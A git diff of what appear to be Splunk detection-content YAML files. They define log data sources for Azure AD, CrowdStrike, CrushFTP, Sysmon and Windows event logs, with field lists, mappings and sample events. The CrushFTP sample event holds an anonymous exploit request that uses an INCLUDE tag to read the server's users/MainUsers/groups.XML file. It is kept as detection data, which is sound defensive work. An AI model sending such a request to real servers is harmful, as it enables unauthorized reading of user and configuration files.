-example_log: '{"CreationTime": "2023-10-10T17:08:65", "Id": "4593aac8-855f-4341-9d2a-4289146eb800", "Operation": "UserLoginFailed", "OrganizationId": "d541aae6-6b73-4a7c-aaf0-a4de30c872bc", "RecordType": 15, "ResultStatus": "Failed", "UserKey": "57e4bd36-9722-4a4a-9729-7203d8e00b72", "UserType": 0, "Version": 1, "Workload": "AzureActiveDirectory", "ClientIP": "52.3.21.4", "ObjectId": "Unknown", "UserId": "user30@contoso.onmicrosoft.com", "AzureActiveDirectoryEventType": 1, "ExtendedProperties": [{"Name": "ResultStatusDetail", "Value": "UserError"}, {"Name": "UserAgent", "Value": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36"}, {"Name": "UserAuthenticationMethod", "Value": "1"}, {"Name": "RequestType", "Value": "OAuth2:Token"}], "ModifiedProperties": [], "Actor": [{"ID": "57e4bd36-9722-4a4a-9729-7203d8e00b72", "Type": 0}, {"ID": "user30@contoso.onmicrosoft.com", "Type": 5}], "ActorContextId": "d541aae6-6b73-4a7c-aaf0-a4de30c872bc", "ActorIpAddress": "52.3.21.4", "InterSystemsId": "97e59adc-b4be-4ea6-8f17-b46677242190", "IntraSystemId": "eeeba3a0-c619-437a-9879-3dd009f9bf00", "SupportTicketId": "", "Target": [{"ID": "Unknown", "Type": 0}], "TargetContextId": "d541aae6-6b73-4a7c-aaf0-a4de30c872bc", "ApplicationId": "9ba1a5c7-f17a-4de9-a1f1-6178c8d51223", "DeviceProperties": [{"Name": "OS", "Value": "Windows10"}, {"Name": "BrowserType", "Value": "Chrome"}, {"Name": "IsCompliantAndManaged", "Value": "False"}], "ErrorNumber": "50126", "LogonError": "InvalidUserNameOrPassword"}'
diff --git a/data_sources/crowdstrike_processrollup2.yml b/data_sources/crowdstrike_processrollup2.yml
new file mode 100644
index 0000000000..d05927785e
--- /dev/null
+++ b/data_sources/crowdstrike_processrollup2.yml
@@ -0,0 +1,108 @@
+name: CrowdStrike ProcessRollup2
+id: cbb06880-9dd9-4542-ac60-bd6e5d3c3e4e
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for CrowdStrike ProcessRollup2
+source: crowdstrike
+sourcetype: crowdstrike:events:sensor
+separator: event_simpleName
+supported_TA:
+- name: CrowdStrike Falcon Event Streams Technical Add-On
+  url: https://splunkbase.splunk.com/app/5082
+  version: 3.2.1
+fields:
+- AuthenticationId
+- AuthenticationId_meaning
+- AuthenticodeHashData
+- CommandLine
+- ConfigBuild
+- ConfigStateHash
+- EffectiveTransmissionClass
+- Entitlements
+- EventOrigin
+- ImageFileName
+- ImageSubsystem
+- ImageSubsystem_meaning
+- IntegrityLevel
+- IntegrityLevel_meaning
+- MD5HashData
+- ParentAuthenticationId
+- ParentBaseFileName
+- ParentProcessId
+- ProcessCreateFlags
+- ProcessEndTime
+- ProcessParameterFlags
+- ProcessParameterFlags_meaning
+- ProcessStartTime
+- ProcessSxsFlags
+- ProcessSxsFlags_meaning
+- RawProcessId
+- SHA1HashData
+- SHA256HashData
+- SessionId
+- SignInfoFlags
+- SignInfoFlags_meaning
+- SourceProcessId
+- SourceThreadId
+- Tags
+- TargetProcessId
+- TokenType
+- TokenType_meaning
+- UserSid
+- WindowFlags
+- WindowFlags_meaning
+- action
+- aid
+- aid_city
+- aid_computer_name
+- aid_continent
+- aid_country
+- aid_machine_domain
+- aid_os_version
+- aid_ou
+- aid_site_name
+- aid_system_product_name
+- aip
+- cid
+- dest
+- event_ingest_time
+- event_platform
+- event_simpleName
+- eventtype
+- host_res_aid
+- id
+- os
+- parent_process_exec
+- parent_process_id
+- parent_process_name
+- process
+- process_exec
+- process_hash
+- process_id
+- process_integrity_level
+- process_name
+- process_path
+- resolve_dest
+- resolve_process_integrity_level
+- tag
+- timestamp
+- user
+- user_id
+- vendor_product
+field_mappings:
+  - data_model: cim
+    data_set: Endpoint.Processes
+    mapping:
+      CommandLine: Processes.process
+      ImageFileName: Processes.process_path
+      ParentBaseFileName: Processes.parent_process_name
+      ParentProcessId: Processes.parent_process_id
+      RawProcessId: Processes.process_id
+      SHA256HashData: Processes.process_hash
+      UserSid: Processes.user
+example_log: '{"LinkName":"C:\\Users\\Administrator\\AppData\\Roaming\\Microsoft\\Windows\\Start
+  Menu\\Programs\\Windows PowerShell\\Windows PowerShell.lnk","ProcessCreateFlags":"67634196","IntegrityLevel":"12288","ParentProcessId":"5459598860","SourceProcessId":"5459598860","aip":"3.126.231.40","SHA1HashData":"0000000000000000000000000000000000000000","UserSid":"S-1-5-21-586445407-708991241-1829972403-500","event_platform":"Win","TokenType":"1","ProcessEndTime":"","AuthenticodeHashData":"3b98faafc17b47beb9027c437fceeafdf0624a1c","ParentBaseFileName":"explorer.exe","EventOrigin":"1","ImageSubsystem":"3","id":"e2210781-0e8f-47d2-bf6a-56d2c59f38ee","EffectiveTransmissionClass":"3","SessionId":"2","ShowWindowFlags":"1","Tags":"27,
+  40, 151, 874, 924, 12094627905582, 12094627906234, 211106232533012, 212205744161605,
+  263882790666253","timestamp":"1713805173418","event_simpleName":"ProcessRollup2","RawProcessId":"5012","ConfigStateHash":"840884426","MD5HashData":"097ce5761c89434367598b34fe32893b","SHA256HashData":"ba4038fd20e474c047be8aad5bfacdb1bfc1ddbe12f803f473b7918d8d819436","ProcessSxsFlags":"64","AuthenticationId":"2669499","ConfigBuild":"1007.3.0018207.1","WindowFlags":"3073","CommandLine":"\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"
+  ","ParentAuthenticationId":"2669499","TargetProcessId":"5642133882","ImageFileName":"\\Device\\HarddiskVolume1\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","SourceThreadId":"30426051160","Entitlements":"15","name":"ProcessRollup2V19","ProcessStartTime":"1713805173.321","ProcessParameterFlags":"24577","aid":"168a90e125d443beb2a4e2914985084d","SignInfoFlags":"8683538","cid":"124cb22314bf4f519be84bce582e7a6b"}'
diff --git a/data_sources/crushftp.yml b/data_sources/crushftp.yml
new file mode 100644
index 0000000000..e868f787d8
--- /dev/null
+++ b/data_sources/crushftp.yml
@@ -0,0 +1,16 @@
+name: CrushFTP
+id: 8a42ace5-e4c8-4653-80cf-1b8e7e6024ef
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for CrushFTP
+source: crushftp
+sourcetype: crushftp:sessionlogs
+supported_TA:
+- {}
+fields:
+- _time
+- _raw
+example_log: 'SESSION|05/14/2024 17:36:21.859|[HTTPS:169_52326_sMa:anonymous:10.0.1.30]
+  READ: *POST /WebInterface/function/?c2f=CmF1&command=zip&path=%3CINCLUDE%3Eusers/MainUsers/groups.XML%3C/INCLUDE%3E&names=/a
+  HTTP/1.1*'
diff --git a/data_sources/endpoint/CrowdStrike.yml b/data_sources/endpoint/CrowdStrike.yml
deleted file mode 100644
index ed765aee8b..0000000000
--- a/data_sources/endpoint/CrowdStrike.yml
+++ /dev/null
@@ -1,13 +0,0 @@
-name: CrowdStrike
-id: 1064b9f3-82cd-4e4f-ac1e-322ec54569a7
-author: Patrick Bareiss, Splunk
-source: crowdstrike
-sourcetype: crowdstrike:events:sensor
-separator: event_simpleName
-supported_TA:
-  name: CrowdStrike Falcon Event Streams Technical Add-On
-  version: 3.2.1
-  url: https://splunkbase.splunk.com/app/5082
-event_names:
-- event_name: Crowdstrike ProcessRollup2
-  data_source: data_sources/endpoint/event_sources/Crowdstrike_ProcessRollup2.yml
\ No newline at end of file
diff --git a/data_sources/endpoint/Sysmon_EventID.yml b/data_sources/endpoint/Sysmon_EventID.yml
deleted file mode 100644
index fe21185eeb..0000000000
--- a/data_sources/endpoint/Sysmon_EventID.yml
+++ /dev/null
@@ -1,50 +0,0 @@
-name: Sysmon EventID
-id: 848aec1b-90aa-48a9-ae52-31d3a2e79697
-author: Patrick Bareiss, Splunk
-source: XmlWinEventLog:Microsoft-Windows-Sysmon/Operational
-sourcetype: xmlwineventlog
-separator: EventID
-configuration: https://github.com/SwiftOnSecurity/sysmon-config
-supported_TA:
-  name: Splunk Add-on for Sysmon
-  version: 4.0.0
-  url: https://splunkbase.splunk.com/app/5709/
-event_names:
-- event_name: Sysmon EventID 1
-  data_source: data_sources/endpoint/event_sources/Sysmon_EventID_1.yml
-- event_name: Sysmon EventID 10
-  data_source: data_sources/endpoint/event_sources/Sysmon_EventID_10.yml
-- event_name: Sysmon EventID 11
-  data_source: data_sources/endpoint/event_sources/Sysmon_EventID_11.yml
-- event_name: Sysmon EventID 12
-  data_source: data_sources/endpoint/event_sources/Sysmon_EventID_12.yml
-- event_name: Sysmon EventID 13
-  data_source: data_sources/endpoint/event_sources/Sysmon_EventID_13.yml
-- event_name: Sysmon EventID 14
-  data_source: data_sources/endpoint/event_sources/Sysmon_EventID_14.yml
-- event_name: Sysmon EventID 15
-  data_source: data_sources/endpoint/event_sources/Sysmon_EventID_15.yml
-- event_name: Sysmon EventID 17
-  data_source: data_sources/endpoint/event_sources/Sysmon_EventID_17.yml
-- event_name: Sysmon EventID 18
-  data_source: data_sources/endpoint/event_sources/Sysmon_EventID_18.yml
-- event_name: Sysmon EventID 20
-  data_source: data_sources/endpoint/event_sources/Sysmon_EventID_20.yml
-- event_name: Sysmon EventID 21
-  data_source: data_sources/endpoint/event_sources/Sysmon_EventID_21.yml
-- event_name: Sysmon EventID 22
-  data_source: data_sources/endpoint/event_sources/Sysmon_EventID_22.yml
-- event_name: Sysmon EventID 23
-  data_source: data_sources/endpoint/event_sources/Sysmon_EventID_23.yml
-- event_name: Sysmon EventID 3
-  data_source: data_sources/endpoint/event_sources/Sysmon_EventID_3.yml
-- event_name: Sysmon EventID 5
-  data_source: data_sources/endpoint/event_sources/Sysmon_EventID_5.yml
-- event_name: Sysmon EventID 6
-  data_source: data_sources/endpoint/event_sources/Sysmon_EventID_6.yml
-- event_name: Sysmon EventID 7
-  data_source: data_sources/endpoint/event_sources/Sysmon_EventID_7.yml
-- event_name: Sysmon EventID 8
-  data_source: data_sources/endpoint/event_sources/Sysmon_EventID_8.yml
-- event_name: Sysmon EventID 9
-  data_source: data_sources/endpoint/event_sources/Sysmon_EventID_9.yml
diff --git a/data_sources/endpoint/Sysmon_for_Linux_EventID.yml b/data_sources/endpoint/Sysmon_for_Linux_EventID.yml
deleted file mode 100644
index 096a4002b5..0000000000
--- a/data_sources/endpoint/Sysmon_for_Linux_EventID.yml
+++ /dev/null
@@ -1,15 +0,0 @@
-name: Sysmon for Linux EventID
-id: da9fc0c9-4b15-4537-aa91-19ca0cb1eba5
-author: Patrick Bareiss, Splunk
-source: Syslog:Linux-Sysmon/Operational
-sourcetype: sysmon:linux
-separator: EventID
-supported_TA:
-  name: Splunk Add-on for Sysmon for Linux
-  version: 1.0.0
-  url: https://splunkbase.splunk.com/app/6652
-event_names:
-- event_name: Sysmon for Linux EventID 1
-  data_source: data_sources/endpoint/event_sources/Sysmon_for_Linux_EventID_1.yml
-- event_name: Sysmon for Linux EventID 11
-  data_source: data_sources/endpoint/event_sources/Sysmon_for_Linux_EventID_11.yml
diff --git a/data_sources/endpoint/Windows_Event_Log_Application.yml b/data_sources/endpoint/Windows_Event_Log_Application.yml
deleted file mode 100644
index a8e99dbb1f..0000000000
--- a/data_sources/endpoint/Windows_Event_Log_Application.yml
+++ /dev/null
@@ -1,15 +0,0 @@
-name: Windows Event Log Application
-id: fc387a6f-0706-49d4-b97f-739144767075
-author: Patrick Bareiss, Splunk
-source: XmlWinEventLog:Application
-sourcetype: XmlWinEventLog
-separator: EventCode
-supported_TA:
-  name: Splunk Add-on for Microsoft Windows
-  version: 8.8.0
-  url: https://splunkbase.splunk.com/app/742
-event_names:
-- event_name: Windows Event Log Application 2282
-  data_source: data_sources/endpoint/event_sources/Windows_Event_Log_Application_2282.yml
-- event_name: Windows Event Log Application 3000
-  data_source: data_sources/endpoint/event_sources/Windows_Event_Log_Application_3000.yml
diff --git a/data_sources/endpoint/Windows_Event_Log_CAPI2.yml b/data_sources/endpoint/Windows_Event_Log_CAPI2.yml
deleted file mode 100644
index e244f1e622..0000000000
--- a/data_sources/endpoint/Windows_Event_Log_CAPI2.yml
+++ /dev/null
@@ -1,15 +0,0 @@
-name: Windows Event Log CAPI2
-id: b77e7a42-6bde-4ff5-971f-5115a8747b66
-author: Patrick Bareiss, Splunk
-source: XmlWinEventLog:Microsoft-Windows-CAPI2/Operational
-sourcetype: xmlwineventlog
-separator: EventCode
-supported_TA:
-  name: Splunk Add-on for Microsoft Windows
-  version: 8.8.0
-  url: https://splunkbase.splunk.com/app/742
-event_names:
-- event_name: Windows Event Log CAPI2 70
-  data_source: data_sources/endpoint/event_sources/Windows_Event_Log_CAPI2_70.yml
-- event_name: Windows Event Log CAPI2 81
-  data_source: data_sources/endpoint/event_sources/Windows_Event_Log_CAPI2_81.yml
diff --git a/data_sources/endpoint/Windows_Event_Log_CertificateServicesClient.yml b/data_sources/endpoint/Windows_Event_Log_CertificateServicesClient.yml
deleted file mode 100644
index 6c17ebb697..0000000000
--- a/data_sources/endpoint/Windows_Event_Log_CertificateServicesClient.yml
+++ /dev/null
@@ -1,13 +0,0 @@
-name: Windows Event Log CertificateServicesClient
-id: dc953ea6-b9f0-4bb6-8f33-6f0c918cdfd2
-author: Patrick Bareiss, Splunk
-source: XmlWinEventLog:Microsoft-Windows-CertificateServicesClient-Lifecycle-System/Operational
-sourcetype: XmlWinEventLog
-separator: EventCode
-supported_TA:
-  name: Splunk Add-on for Microsoft Windows
-  version: 8.8.0
-  url: https://splunkbase.splunk.com/app/742
-event_names:
-- event_name: Windows Event Log CertificateServicesClient 1007
-  data_source: data_sources/endpoint/event_sources/Windows_Event_Log_CertificateServicesClient_1007.yml
diff --git a/data_sources/endpoint/Windows_Event_Log_Defender.yml b/data_sources/endpoint/Windows_Event_Log_Defender.yml
deleted file mode 100644
index 8af7021fe6..0000000000
--- a/data_sources/endpoint/Windows_Event_Log_Defender.yml
+++ /dev/null
@@ -1,31 +0,0 @@
-name: Windows Event Log Defender
-id: 4bae37e2-b347-4d76-b05d-f97066a8aa88
-author: Patrick Bareiss, Splunk
-source: WinEventLog:Microsoft-Windows-Windows Defender/Operational
-sourcetype: xmlwineventlog
-separator: EventCode
-supported_TA:
-  name: Splunk Add-on for Microsoft Windows
-  version: 8.8.0
-  url: https://splunkbase.splunk.com/app/742
-event_names:
-- event_name: Windows Event Log Defender 1121
-  data_source: data_sources/endpoint/event_sources/Windows_Event_Log_Defender_1121.yml
-- event_name: Windows Event Log Defender 1122
-  data_source: data_sources/endpoint/event_sources/Windows_Event_Log_Defender_1122.yml
-- event_name: Windows Event Log Defender 1125
-  data_source: data_sources/endpoint/event_sources/Windows_Event_Log_Defender_1125.yml
-- event_name: Windows Event Log Defender 1126
-  data_source: data_sources/endpoint/event_sources/Windows_Event_Log_Defender_1126.yml
-- event_name: Windows Event Log Defender 1129
-  data_source: data_sources/endpoint/event_sources/Windows_Event_Log_Defender_1129.yml
-- event_name: Windows Event Log Defender 1131
-  data_source: data_sources/endpoint/event_sources/Windows_Event_Log_Defender_1131.yml
-- event_name: Windows Event Log Defender 1132
-  data_source: data_sources/endpoint/event_sources/Windows_Event_Log_Defender_1132.yml
-- event_name: Windows Event Log Defender 1133
-  data_source: data_sources/endpoint/event_sources/Windows_Event_Log_Defender_1133.yml
-- event_name: Windows Event Log Defender 1134
-  data_source: data_sources/endpoint/event_sources/Windows_Event_Log_Defender_1134.yml
-- event_name: Windows Event Log Defender 5007
-  data_source: data_sources/endpoint/event_sources/Windows_Event_Log_Defender_5007.yml
diff --git a/data_sources/endpoint/Windows_Event_Log_Printservice.yml b/data_sources/endpoint/Windows_Event_Log_Printservice.yml
deleted file mode 100644
index c9eb336f3a..0000000000
--- a/data_sources/endpoint/Windows_Event_Log_Printservice.yml
+++ /dev/null
@@ -1,17 +0,0 @@
-name: Windows Event Log Printservice
-id: ba8f90f0-2028-44b5-853a-18f63ebd25e4
-author: Patrick Bareiss, Splunk
-source: WinEventLog:Microsoft-Windows-PrintService/Admin
-sourcetype: WinEventLog
-separator: EventCode
-supported_TA:
-  name: Splunk Add-on for Microsoft Windows
-  version: 8.8.0
-  url: https://splunkbase.splunk.com/app/742
-event_names:
-- event_name: Windows Event Log Printservice 316
-  data_source: data_sources/endpoint/event_sources/Windows_Event_Log_Printservice_316.yml
-- event_name: Windows Event Log Printservice 4909
-  data_source: data_sources/endpoint/event_sources/Windows_Event_Log_Printservice_4909.yml
-- event_name: Windows Event Log Printservice 808
-  data_source: data_sources/endpoint/event_sources/Windows_Event_Log_Printservice_808.yml
diff --git a/data_sources/endpoint/Windows_Event_Log_RemoteConnectionManager.yml b/data_sources/endpoint/Windows_Event_Log_RemoteConnectionManager.yml
deleted file mode 100644
index 016868c6e0..0000000000
--- a/data_sources/endpoint/Windows_Event_Log_RemoteConnectionManager.yml
+++ /dev/null
@@ -1,13 +0,0 @@
-name: Windows Event Log RemoteConnectionManager
-id: 7f0df187-53bc-4a6f-ada9-0ea3026b9d3b
-author: Patrick Bareiss, Splunk
-source: WinEventLog:Microsoft-Windows-TerminalServices-RemoteConnectionManager/Operational
-sourcetype: wineventlog
-separator: EventCode
-supported_TA:
-  name: Splunk Add-on for Microsoft Windows
-  version: 8.8.0
-  url: https://splunkbase.splunk.com/app/742
-event_names:
-- event_name: Windows Event Log RemoteConnectionManager 1149
-  data_source: data_sources/endpoint/event_sources/Windows_Event_Log_RemoteConnectionManager_1149.yml
diff --git a/data_sources/endpoint/Windows_Event_Log_Security.yml b/data_sources/endpoint/Windows_Event_Log_Security.yml
deleted file mode 100644
index ca5c7355c4..0000000000
--- a/data_sources/endpoint/Windows_Event_Log_Security.yml
+++ /dev/null
@@ -1,89 +0,0 @@
-name: Windows Event Log Security
-id: e3e44de1-57b1-462d-b57c-c7657af7ae6e
-author: Patrick Bareiss, Splunk
-source: XmlWinEventLog:Security
-sourcetype: xmlwineventlog
-separator: EventCode
-supported_TA:
-  name: Splunk Add-on for Microsoft Windows
-  version: 8.8.0
-  url: https://splunkbase.splunk.com/app/742
-event_names:
-- event_name: Windows Event Log Security 1100
-  data_source: data_sources/endpoint/event_sources/Windows_Event_Log_Security_1100.yml
-- event_name: Windows Event Log Security 1102
-  data_source: data_sources/endpoint/event_sources/Windows_Event_Log_Security_1102.yml
-- event_name: Windows Event Log Security 4624
-  data_source: data_sources/endpoint/event_sources/Windows_Event_Log_Security_4624.yml
-- event_name: Windows Event Log Security 4625
-  data_source: data_sources/endpoint/event_sources/Windows_Event_Log_Security_4625.yml
-- event_name: Windows Event Log Security 4627
-  data_source: data_sources/endpoint/event_sources/Windows_Event_Log_Security_4627.yml
-- event_name: Windows Event Log Security 4648
-  data_source: data_sources/endpoint/event_sources/Windows_Event_Log_Security_4648.yml
-- event_name: Windows Event Log Security 4662
-  data_source: data_sources/endpoint/event_sources/Windows_Event_Log_Security_4662.yml
-- event_name: Windows Event Log Security 4663
-  data_source: data_sources/endpoint/event_sources/Windows_Event_Log_Security_4663.yml
-- event_name: Windows Event Log Security 4672
-  data_source: data_sources/endpoint/event_sources/Windows_Event_Log_Security_4672.yml
-- event_name: Windows Event Log Security 4688
-  data_source: data_sources/endpoint/event_sources/Windows_Event_Log_Security_4688.yml
-- event_name: Windows Event Log Security 4698
-  data_source: data_sources/endpoint/event_sources/Windows_Event_Log_Security_4698.yml
-- event_name: Windows Event Log Security 4699
-  data_source: data_sources/endpoint/event_sources/Windows_Event_Log_Security_4699.yml
-- event_name: Windows Event Log Security 4703
-  data_source: data_sources/endpoint/event_sources/Windows_Event_Log_Security_4703.yml
-- event_name: Windows Event Log Security 4719
-  data_source: data_sources/endpoint/event_sources/Windows_Event_Log_Security_4719.yml
-- event_name: Windows Event Log Security 4720
-  data_source: data_sources/endpoint/event_sources/Windows_Event_Log_Security_4720.yml
-- event_name: Windows Event Log Security 4724
-  data_source: data_sources/endpoint/event_sources/Windows_Event_Log_Security_4724.yml
-- event_name: Windows Event Log Security 4725
-  data_source: data_sources/endpoint/event_sources/Windows_Event_Log_Security_4725.yml
-- event_name: Windows Event Log Security 4726
-  data_source: data_sources/endpoint/event_sources/Windows_Event_Log_Security_4726.yml
-- event_name: Windows Event Log Security 4728
-  data_source: data_sources/endpoint/event_sources/Windows_Event_Log_Security_4728.yml
-- event_name: Windows Event Log Security 4732
-  data_source: data_sources/endpoint/event_sources/Windows_Event_Log_Security_4732.yml
-- event_name: Windows Event Log Security 4738
-  data_source: data_sources/endpoint/event_sources/Windows_Event_Log_Security_4738.yml
-- event_name: Windows Event Log Security 4739
-  data_source: data_sources/endpoint/event_sources/Windows_Event_Log_Security_4739.yml
-- event_name: Windows Event Log Security 4741
-  data_source: data_sources/endpoint/event_sources/Windows_Event_Log_Security_4741.yml
-- event_name: Windows Event Log Security 4742
-  data_source: data_sources/endpoint/event_sources/Windows_Event_Log_Security_4742.yml
-- event_name: Windows Event Log Security 4768
-  data_source: data_sources/endpoint/event_sources/Windows_Event_Log_Security_4768.yml
-- event_name: Windows Event Log Security 4769
-  data_source: data_sources/endpoint/event_sources/Windows_Event_Log_Security_4769.yml
-- event_name: Windows Event Log Security 4771
-  data_source: data_sources/endpoint/event_sources/Windows_Event_Log_Security_4771.yml
-- event_name: Windows Event Log Security 4776
-  data_source: data_sources/endpoint/event_sources/Windows_Event_Log_Security_4776.yml
-- event_name: Windows Event Log Security 4781
-  data_source: data_sources/endpoint/event_sources/Windows_Event_Log_Security_4781.yml
-- event_name: Windows Event Log Security 4794
-  data_source: data_sources/endpoint/event_sources/Windows_Event_Log_Security_4794.yml
-- event_name: Windows Event Log Security 4798
-  data_source: data_sources/endpoint/event_sources/Windows_Event_Log_Security_4798.yml
-- event_name: Windows Event Log Security 4876
-  data_source: data_sources/endpoint/event_sources/Windows_Event_Log_Security_4876.yml
-- event_name: Windows Event Log Security 4886
-  data_source: data_sources/endpoint/event_sources/Windows_Event_Log_Security_4886.yml
-- event_name: Windows Event Log Security 4887
-  data_source: data_sources/endpoint/event_sources/Windows_Event_Log_Security_4887.yml
-- event_name: Windows Event Log Security 5136
-  data_source: data_sources/endpoint/event_sources/Windows_Event_Log_Security_5136.yml
-- event_name: Windows Event Log Security 5137
-  data_source: data_sources/endpoint/event_sources/Windows_Event_Log_Security_5137.yml
-- event_name: Windows Event Log Security 5140
-  data_source: data_sources/endpoint/event_sources/Windows_Event_Log_Security_5140.yml
-- event_name: Windows Event Log Security 5141
-  data_source: data_sources/endpoint/event_sources/Windows_Event_Log_Security_5141.yml
-- event_name: Windows Event Log Security 5145
-  data_source: data_sources/endpoint/event_sources/Windows_Event_Log_Security_5145.yml
diff --git a/data_sources/endpoint/Windows_Event_Log_System.yml b/data_sources/endpoint/Windows_Event_Log_System.yml
deleted file mode 100644
index 65daacfa51..0000000000
--- a/data_sources/endpoint/Windows_Event_Log_System.yml
+++ /dev/null
@@ -1,23 +0,0 @@
-name: Windows Event Log System
-id: 5f303f66-1947-49b8-8b26-f61c8de11cc3
-author: Patrick Bareiss, Splunk
-source: WinEventLog:System
-sourcetype: WinEventLog
-separator: EventCode
-supported_TA:
-  name: Splunk Add-on for Microsoft Windows
-  version: 8.8.0
-  url: https://splunkbase.splunk.com/app/742
-event_names:
-- event_name: Windows Event Log System 104
-  data_source: data_sources/endpoint/event_sources/Windows_Event_Log_System_104.yml
-- event_name: Windows Event Log System 4720
-  data_source: data_sources/endpoint/event_sources/Windows_Event_Log_System_4720.yml
-- event_name: Windows Event Log System 4726
-  data_source: data_sources/endpoint/event_sources/Windows_Event_Log_System_4726.yml
-- event_name: Windows Event Log System 7036
-  data_source: data_sources/endpoint/event_sources/Windows_Event_Log_System_7036.yml
-- event_name: Windows Event Log System 7040
-  data_source: data_sources/endpoint/event_sources/Windows_Event_Log_System_7040.yml
-- event_name: Windows Event Log System 7045
-  data_source: data_sources/endpoint/event_sources/Windows_Event_Log_System_7045.yml
diff --git a/data_sources/endpoint/Windows_Event_Log_TaskScheduler.yml b/data_sources/endpoint/Windows_Event_Log_TaskScheduler.yml
deleted file mode 100644
index 4d86b7675a..0000000000
--- a/data_sources/endpoint/Windows_Event_Log_TaskScheduler.yml
+++ /dev/null
@@ -1,15 +0,0 @@
-name: Windows Event Log TaskScheduler
-id: 1f422461-5810-445d-a304-223b26841267
-author: Patrick Bareiss, Splunk
-source: WinEventLog:Microsoft-Windows-TaskScheduler/Operational
-sourcetype: wineventlog
-separator: EventCode
-supported_TA:
-  name: Splunk Add-on for Microsoft Windows
-  version: 8.8.0
-  url: https://splunkbase.splunk.com/app/742
-event_names:
-- event_name: Windows Event Log TaskScheduler 200
-  data_source: data_sources/endpoint/event_sources/Windows_Event_Log_TaskScheduler_200.yml
-- event_name: Windows Event Log TaskScheduler 201
-  data_source: data_sources/endpoint/event_sources/Windows_Event_Log_TaskScheduler_201.yml
diff --git a/data_sources/endpoint/event_sources/Crowdstrike_ProcessRollup2.yml b/data_sources/endpoint/event_sources/Crowdstrike_ProcessRollup2.yml
deleted file mode 100644
index 93b21e1b10..0000000000
--- a/data_sources/endpoint/event_sources/Crowdstrike_ProcessRollup2.yml
+++ /dev/null
@@ -1,92 +0,0 @@
-event_name: Crowdstrike ProcessRollup2
-fields:
-  - AuthenticationId
-  - AuthenticationId_meaning
-  - AuthenticodeHashData
-  - CommandLine
-  - ConfigBuild
-  - ConfigStateHash
-  - EffectiveTransmissionClass
-  - Entitlements
-  - EventOrigin
-  - ImageFileName
-  - ImageSubsystem
-  - ImageSubsystem_meaning
-  - IntegrityLevel
-  - IntegrityLevel_meaning
-  - MD5HashData
-  - ParentAuthenticationId
-  - ParentBaseFileName
-  - ParentProcessId
-  - ProcessCreateFlags
-  - ProcessEndTime
-  - ProcessParameterFlags
-  - ProcessParameterFlags_meaning
-  - ProcessStartTime
-  - ProcessSxsFlags
-  - ProcessSxsFlags_meaning
-  - RawProcessId
-  - SHA1HashData
-  - SHA256HashData
-  - SessionId
-  - SignInfoFlags
-  - SignInfoFlags_meaning
-  - SourceProcessId
-  - SourceThreadId
-  - Tags
-  - TargetProcessId
-  - TokenType
-  - TokenType_meaning
-  - UserSid
-  - WindowFlags
-  - WindowFlags_meaning
-  - action
-  - aid
-  - aid_city
-  - aid_computer_name
-  - aid_continent
-  - aid_country
-  - aid_machine_domain
-  - aid_os_version
-  - aid_ou
-  - aid_site_name
-  - aid_system_product_name
-  - aip
-  - cid
-  - dest
-  - event_ingest_time
-  - event_platform
-  - event_simpleName
-  - eventtype
-  - host_res_aid
-  - id
-  - os
-  - parent_process_exec
-  - parent_process_id
-  - parent_process_name
-  - process
-  - process_exec
-  - process_hash
-  - process_id
-  - process_integrity_level
-  - process_name
-  - process_path
-  - resolve_dest
-  - resolve_process_integrity_level
-  - tag
-  - timestamp
-  - user
-  - user_id
-  - vendor_product
-field_mappings:
-  - data_model: cim
-    data_set: Endpoint.Processes
-    mapping:
-      CommandLine: Processes.process
-      ImageFileName: Processes.process_path
-      ParentBaseFileName: Processes.parent_process_name
-      ParentProcessId: Processes.parent_process_id
-      RawProcessId: Processes.process_id
-      SHA256HashData: Processes.process_hash
-      UserSid: Processes.user
-example_log: '{"LinkName":"C:\\Users\\Administrator\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Windows PowerShell\\Windows PowerShell.lnk","ProcessCreateFlags":"67634196","IntegrityLevel":"12288","ParentProcessId":"5459598860","SourceProcessId":"5459598860","aip":"3.126.231.40","SHA1HashData":"0000000000000000000000000000000000000000","UserSid":"S-1-5-21-586445407-708991241-1829972403-500","event_platform":"Win","TokenType":"1","ProcessEndTime":"","AuthenticodeHashData":"3b98faafc17b47beb9027c437fceeafdf0624a1c","ParentBaseFileName":"explorer.exe","EventOrigin":"1","ImageSubsystem":"3","id":"e2210781-0e8f-47d2-bf6a-56d2c59f38ee","EffectiveTransmissionClass":"3","SessionId":"2","ShowWindowFlags":"1","Tags":"27, 40, 151, 874, 924, 12094627905582, 12094627906234, 211106232533012, 212205744161605, 263882790666253","timestamp":"1713805173418","event_simpleName":"ProcessRollup2","RawProcessId":"5012","ConfigStateHash":"840884426","MD5HashData":"097ce5761c89434367598b34fe32893b","SHA256HashData":"ba4038fd20e474c047be8aad5bfacdb1bfc1ddbe12f803f473b7918d8d819436","ProcessSxsFlags":"64","AuthenticationId":"2669499","ConfigBuild":"1007.3.0018207.1","WindowFlags":"3073","CommandLine":"\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" ","ParentAuthenticationId":"2669499","TargetProcessId":"5642133882","ImageFileName":"\\Device\\HarddiskVolume1\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","SourceThreadId":"30426051160","Entitlements":"15","name":"ProcessRollup2V19","ProcessStartTime":"1713805173.321","ProcessParameterFlags":"24577","aid":"168a90e125d443beb2a4e2914985084d","SignInfoFlags":"8683538","cid":"124cb22314bf4f519be84bce582e7a6b"}'
diff --git a/data_sources/endpoint/event_sources/Sysmon_EventID_1.yml b/data_sources/endpoint/event_sources/Sysmon_EventID_1.yml
deleted file mode 100644
index f0cc4704cf..0000000000
--- a/data_sources/endpoint/event_sources/Sysmon_EventID_1.yml
+++ /dev/null
@@ -1,140 +0,0 @@
-event_name: Sysmon EventID 1
-fields:
-  - _time
-  - Channel
-  - CommandLine
-  - Company
-  - Computer
-  - CurrentDirectory
-  - Description
-  - EventChannel
-  - EventCode
-  - EventData_Xml
-  - EventDescription
-  - EventID
-  - EventRecordID
-  - FileVersion
-  - Guid
-  - Hashes
-  - IMPHASH
-  - Image
-  - IntegrityLevel
-  - Keywords
-  - Level
